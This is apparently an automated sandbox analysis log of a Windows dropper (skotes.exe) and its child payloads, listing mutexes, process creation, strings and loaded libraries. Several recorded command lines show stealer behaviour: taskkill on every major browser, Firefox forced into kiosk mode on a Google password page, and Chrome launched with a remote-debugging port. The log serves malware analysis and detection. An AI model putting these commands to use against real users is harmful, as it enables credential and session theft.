Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: c4df60870c.exe, 0000000A.00000002.3011320800.000000001D8AC000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3024863817.000000006C0CF000.00000002.00000001.01000000.0000001B.sdmp, c4df60870c.exe, 0000000A.00000002.3019723772.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: c4df60870c.exe, 0000000A.00000002.3011320800.000000001D8AC000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3024863817.000000006C0CF000.00000002.00000001.01000000.0000001B.sdmp, c4df60870c.exe, 0000000A.00000002.3019723772.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: c4df60870c.exe, 0000000A.00000002.3011320800.000000001D8AC000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3024863817.000000006C0CF000.00000002.00000001.01000000.0000001B.sdmp, c4df60870c.exe, 0000000A.00000002.3019723772.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: c4df60870c.exe, 0000000A.00000002.3011320800.000000001D8AC000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3024863817.000000006C0CF000.00000002.00000001.01000000.0000001B.sdmp, c4df60870c.exe, 0000000A.00000002.3019723772.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: c4df60870c.exe, 0000000A.00000002.3011320800.000000001D8AC000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3024863817.000000006C0CF000.00000002.00000001.01000000.0000001B.sdmp, c4df60870c.exe, 0000000A.00000002.3019723772.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: c4df60870c.exe, 0000000A.00000002.3011320800.000000001D8AC000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3019723772.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: c4df60870c.exe, 0000000A.00000002.3011320800.000000001D8AC000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3024863817.000000006C0CF000.00000002.00000001.01000000.0000001B.sdmp, c4df60870c.exe, 0000000A.00000002.3019723772.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 0d287ea527.exe, 00000009.00000003.2565126682.00000000051E4000.00000004.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000003.2811414741.000000001D778000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2723150482.00000000058CC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: c4df60870c.exe, 0000000A.00000002.3011320800.000000001D8AC000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3019723772.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: c4df60870c.exe, 0000000A.00000002.3011320800.000000001D8AC000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3019723772.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe "C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe "C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe "C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe "C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe"
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe "C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe"
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2276 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2204 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2f0dfb3-3ec4-49ae-8288-95dd845a4bda} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 28c8b06d910 socket
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2260,i,3014244038502774906,14661954972306353127,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe "C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2260,i,3014244038502774906,14661954972306353127,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe "C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3516 -parentBuildID 20230927232528 -prefsHandle 2672 -prefMapHandle 2612 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88ac05a8-4630-40f5-8a59-e55504046001} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 28c9d3bac10 rdd
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe "C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe"
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0d287ea527.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2228,i,13965840192898022017,8926137046565118761,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe "C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe "C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe "C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe "C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe "C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0d287ea527.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2276 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2204 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2f0dfb3-3ec4-49ae-8288-95dd845a4bda} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 28c8b06d910 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3516 -parentBuildID 20230927232528 -prefsHandle 2672 -prefMapHandle 2612 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88ac05a8-4630-40f5-8a59-e55504046001} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 28c9d3bac10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2260,i,3014244038502774906,14661954972306353127,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2260,i,3014244038502774906,14661954972306353127,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2228,i,13965840192898022017,8926137046565118761,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
